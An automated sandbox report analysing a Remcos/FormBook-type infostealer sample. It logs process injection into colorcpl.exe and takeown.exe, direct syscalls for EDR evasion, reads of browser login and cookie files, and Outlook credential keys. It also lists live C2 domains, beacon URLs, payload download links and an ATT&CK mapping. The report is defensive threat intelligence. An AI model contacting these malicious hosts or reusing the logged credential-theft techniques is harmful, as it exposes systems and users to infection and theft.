              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtSetInformationThread: Direct from: 0x77762B4C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtClose: Direct from: 0x77762B6C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtCreateKey: Direct from: 0x77762C6C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQuerySystemInformation: Direct from: 0x777648CC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtOpenSection: Direct from: 0x77762E0C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQueryInformationToken: Direct from: 0x77762CAC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtTerminateThread: Direct from: 0x77762FCC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtCreateFile: Direct from: 0x77762FEC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtOpenFile: Direct from: 0x77762DCC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtOpenKeyEx: Direct from: 0x77762B9C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtSetInformationProcess: Direct from: 0x77762C5C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
              Source: C:\Users\user\Desktop\z10982283782.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: read write
              Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\takeown.exe | Thread register set: target process: 1732
              Source: C:\Windows\SysWOW64\takeown.exe | Thread APC queued: target process: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
              Source: C:\Users\user\Desktop\z10982283782.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
              Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02A95ACC
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: GetLocaleInfoA, | 0_2_02A9A7C4
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02A95BD8
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: GetLocaleInfoA, | 0_2_02A9A810
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9920C GetLocalTime, | 0_2_02A9920C
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9B78C GetVersionExA, | 0_2_02A9B78C

              Stealing of Sensitive Information

              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              MITRE ATT&CK Matrix (one tactic per column; a number in front of a technique name is the report's signature-count badge for that technique)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Valid Accounts | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Access Token Manipulation | LSASS Memory | 321 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 712 Process Injection | 2 Virtualization/Sandbox Evasion | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Abuse Elevation Control Mechanism | 712 Process Injection | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 1 System Network Connections Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 125 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Behavior Graph ID: 1539808 | Sample: z10982283782.exe | Startdate: 23/10/2024 | Architecture: WINDOWS | Score: 100

              Start node: www.joshcharlesfitness.xyz; www.98080753.xyz; 13 other IPs or domains | Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures | www.98080753.xyz: Performs DNS queries to domains with low reputation
              z10982283782.exe (started) | bitbucket.org 185.166.143.48, 443, 49699, 49700 AMAZON-02US Germany; s3-w.us-east-1.amazonaws.com 3.5.3.65, 443, 49701, 49704 AMAZON-AESUS United States; 54.231.236.129, 443, 49713 AMAZON-02US United States | Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Allocates many large memory junks; 3 other signatures
                colorcpl.exe 2 (started) | Signatures: Maps a DLL or memory area into another process
                  ObMmiCfBgqmt.exe (injected) | Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    takeown.exe 13 (started) | Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      ObMmiCfBgqmt.exe (injected) | www.facaicloud.top 74.48.31.123, 59633, 59644, 59650 TELUS-3CA Canada; www.98080753.xyz 161.97.168.245, 59652, 59653, 59654 CONTABODE United States; 3 other IPs or domains | Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      firefox.exe (started)

              Source | Detection | Scanner | Label
              z10982283782.exe | 53% | ReversingLabs | Win32.Trojan.Remcos
              z10982283782.exe | 54% | Virustotal |
              z10982283782.exe | 100% | Avira | HEUR/AGEN.1326062
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              s3-w.us-east-1.amazonaws.com | 0% | Virustotal |
              bitbucket.org | 0% | Virustotal |
              www.facaicloud.top | 4% | Virustotal |
              wcp58.top | 0% | Virustotal |
              Source | Detection | Scanner | Label
              https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
              https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
              https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
              https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              s3-w.us-east-1.amazonaws.com | 3.5.3.65 | true | false | | unknown
              bitbucket.org | 185.166.143.48 | true | true | | unknown
              www.facaicloud.top | 74.48.31.123 | true | true | | unknown
              wcp58.top | 154.23.184.240 | true | true | | unknown
              www.cpamerix.online | 194.58.112.174 | true | true | | unknown
              www.g4s7e5.biz | 203.90.227.88 | true | true | | unknown
              www.98080753.xyz | 161.97.168.245 | true | true | | unknown
              joshcharlesfitness.xyz | 3.33.130.190 | true | true | | unknown
              lotus9.life | 3.33.130.190 | true | true | | unknown
              www.joshcharlesfitness.xyz | unknown | unknown | true | | unknown
              www.wcp58.top | unknown | unknown | true | | unknown
              bbuseruploads.s3.amazonaws.com | unknown | unknown | true | | unknown
              www.lotus9.life | unknown | unknown | true | | unknown
              171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://www.wcp58.top/u071/ | true | | unknown
              http://www.cpamerix.online/muj9/ | true | | unknown
              http://www.wcp58.top/u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ld | true | | unknown
              https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw | true | | unknown
              http://www.lotus9.life/t67j/ | true | | unknown
              http://www.98080753.xyz/eth5/ | true | | unknown
              http://www.lotus9.life/t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld | true | | unknown
              http://www.joshcharlesfitness.xyz/f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld | true | | unknown
              http://www.facaicloud.top/dc1u/ | true | | unknown
              http://www.facaicloud.top/dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ld | true | | unknown
              http://www.cpamerix.online/muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ld | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | true
3.5.3.65 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
154.23.184.240 | wcp58.top | United States | 174 | COGENT-174US | true
74.48.31.123 | www.facaicloud.top | Canada | 14663 | TELUS-3CA | true
194.58.112.174 | www.cpamerix.online | Russian Federation | 197695 | AS-REGRU | true
3.33.130.190 | joshcharlesfitness.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
54.231.236.129 | unknown | United States | 16509 | AMAZON-02US | false
161.97.168.245 | www.98080753.xyz | United States | 51167 | CONTABODE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539808
Start date and time: 2024-10-23 07:01:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z10982283782.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/1@11/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 48
• Number of non-executed functions: 262
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:02:07 | API Interceptor | 1x Sleep call for process: z10982283782.exe modified
02:05:23 | API Interceptor | 2728929x Sleep call for process: takeown.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.166.143.48 | #U65b0#U7522#U54c1#U8a02#U55ae.vbs | malicious | FormBook
185.166.143.48 | Order.vbs | malicious | Remcos
185.166.143.48 | https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe | malicious | Unknown
185.166.143.48 | Z2tJveQl3B.exe | malicious | Unknown
185.166.143.48 | 70973273827.exe | malicious | DBatLoader, FormBook
185.166.143.48 | ip4.cmd | malicious | Unknown
185.166.143.48 | Doc047892345y.exe | malicious | DBatLoader, FormBook
185.166.143.48 | SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe | malicious | Vidar, Xmrig
185.166.143.48 | 849128312.cmd | malicious | Unknown
185.166.143.48 | 6706e721f2c06.exe | malicious | Remcos
154.23.184.240 | 890927362736.exe | malicious | DBatLoader, FormBook | www.wcp58.top/u071/
154.23.184.240 | Hesap-hareketleriniz10-15-2024.exe | malicious | FormBook | www.wcq24.top/n6pg/
154.23.184.240 | Hesap-hareketleriniz10-15-2024.exe | malicious | FormBook | www.wcq24.top/n6pg/
154.23.184.240 | PAYMENT ADVISE#9879058.exe | malicious | FormBook | www.wcq24.top/4jol/
154.23.184.240 | Hesap-hareketleriniz.exe | malicious | FormBook | www.wcq24.top/n6pg/
154.23.184.240 | PO2024033194.exe | malicious | FormBook | www.wcq24.top/i557/
154.23.184.240 | PO #86637.exe | malicious | FormBook | www.hm62t.top/edpl/
154.23.184.240 | PO2-2401-0016 (TR).exe | malicious | FormBook | www.hm62t.top/p39s/
154.23.184.240 | invoice.exe | malicious | FormBook | www.hm62t.top/edpl/
154.23.184.240 | Purchase Order TE- 00011-7777.exe | malicious | FormBook | www.hm62t.top/p39s/
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| www.cpamerix.online | 890927362736.exe | malicious | DBatLoader, FormBook | 194.58.112.174 |
| bitbucket.org | z11Nuevalistadepedidos.exe | malicious | DBatLoader, FormBook | 185.166.143.49 |
| | #U65b0#U7522#U54c1#U8a02#U55ae.vbs | malicious | FormBook | 185.166.143.48 |
| | Order.vbs | malicious | Remcos | 185.166.143.48 |
| | https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe | malicious | Unknown | 185.166.143.48 |
| | Z2tJveQl3B.exe | malicious | Unknown | 185.166.143.48 |
| | PI and payment confirmed Pdf.exe | malicious | DBatLoader | 185.166.143.50 |
| | 890927362736.exe | malicious | DBatLoader, FormBook | 185.166.143.50 |
| | https://bitbucket.org/aaa14/aaaa/downloads/script3.txt | malicious | Unknown | 185.166.143.50 |
| | https://bitbucket.org/aaa14/aaaa/downloads/xwormberlyn.txt | malicious | Unknown | 185.166.143.49 |
| | 70973273827.exe | malicious | DBatLoader, FormBook | 185.166.143.48 |
| s3-w.us-east-1.amazonaws.com | z11Nuevalistadepedidos.exe | malicious | DBatLoader, FormBook | 52.217.224.177 |
| | #U65b0#U7522#U54c1#U8a02#U55ae.vbs | malicious | FormBook | 3.5.29.106 |
| | Order.vbs | malicious | Remcos | 52.217.161.161 |
| | https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe | malicious | Unknown | 3.5.28.243 |
| | https://www.bing.com/ck/a?!&&p=c60f44e2e0299106bbda17ed4610b6a047eac19fa538687ebec1fc78213d7903JmltdHM9MTcyOTEyMzIwMA&ptn=3&ver=2&hsh=4&fclid=234c270a-e3bc-6c48-2bf3-3210e2866d6d&psq=Siemens+v17&u=a1aHR0cHM6Ly9wbGM0bWUuY29tL2Rvd25sb2FkLXRpYS1wb3J0YWwtdjE3LWZ1bGwtdmVyc2lvbi1nb29nbGVkcml2ZS8&ntb=1 | malicious | Unknown | 52.217.121.241 |
| | https://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.html | malicious | Unknown | 3.5.28.238 |
| | Simple.exe | malicious | Unknown | 3.5.28.174 |
| | Simple.exe | malicious | Unknown | 3.5.28.119 |
| | PI and payment confirmed Pdf.exe | malicious | DBatLoader | 3.5.12.147 |
| | 890927362736.exe | malicious | DBatLoader, FormBook | 3.5.25.173 |
| www.facaicloud.top | 890927362736.exe | malicious | DBatLoader, FormBook | 74.48.31.123 |
| | COMMERCIAL INVOICES.exe | malicious | FormBook | 74.48.31.123 |
| www.g4s7e5.biz | 890927362736.exe | malicious | DBatLoader, FormBook | 203.90.227.88 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| AMAZON-AESUS | https://login.officefitnesschallenge.com/generate-doc-uid-mkopl4uyg6rde32ws | malicious | HTMLPhisher | 3.228.199.139 |
| | https://www.filemail.com/t/cFCAI9C4 | malicious | HtmlDropper | 52.20.189.207 |
| | https://login.officefitnesschallenge.com/generate-doc-uid-mkopl4uyg6rde32ws | malicious | HTMLPhisher | 3.228.199.139 |
| | la.bot.arm5.elf | malicious | Unknown | 52.0.148.51 |
| | la.bot.arm.elf | malicious | Unknown | 184.73.170.219 |
| | https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUS | malicious | Unknown | 52.5.165.83 |
| | Scan copy of document .pdf | malicious | Unknown | 18.207.85.246 |
| | roba.txt | malicious | Meterpreter, ReflectiveLoader | 52.5.13.197 |
| | https://link.edgepilot.com/s/638b11ee/5PAE0D7rGEubgiw42RPNhQ?u=https://flow.wirtube.com/ | malicious | HTMLPhisher | 44.195.238.119 |
| | https://www.gn3atrk.com/DRDPB6M/361N8SL9/?sub1=Woe | malicious | Unknown | 18.235.133.40 |
| TELUS-3CA | 890927362736.exe | malicious | DBatLoader, FormBook | 74.48.31.123 |
| | COMMERCIAL INVOICES.exe | malicious | FormBook | 74.48.31.123 |
| | na.elf | malicious | Mirai | 74.48.138.31 |
| | https://uspsi.cfd/ | malicious | Unknown | 74.48.84.99 |
| | PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | 74.48.34.14 |
| | MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | 74.48.34.14 |
| | MV ALIADO - S-REQ-19-00064 List items.exe | malicious | FormBook | 74.48.34.14 |
| | MV ALIADO - S-REQ-19-00064.7Z.exe | malicious | FormBook | 74.48.34.14 |
| | 176654 Grade B2FA, BRF-MBO2 & CX2OB.exe | malicious | FormBook | 74.48.34.14 |
| | UXJM4UoKhk.exe | malicious | AgentTesla, PureLog Stealer | 74.48.143.82 |
| COGENT-174US | https://www.filemail.com/t/cFCAI9C4 | malicious | HtmlDropper | 23.237.50.106 |
| | la.bot.arm7.elf | malicious | Unknown | 38.54.122.172 |
| | la.bot.arm.elf | malicious | Unknown | 38.134.159.179 |
| | la.bot.mipsel.elf | malicious | Unknown | 38.199.162.51 |
| | FINAL SETTLEMENT DOCUMENT_ LIEN WAVER DURATION- 57185f7898fa8b51ebd3deed1492e65365186c19.eml | malicious | HTMLPhisher | 154.12.225.231 |
| | bin.exe | malicious | Unknown | 154.23.181.7 |
| | LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | malicious | Remcos, GuLoader | 143.244.46.150 |
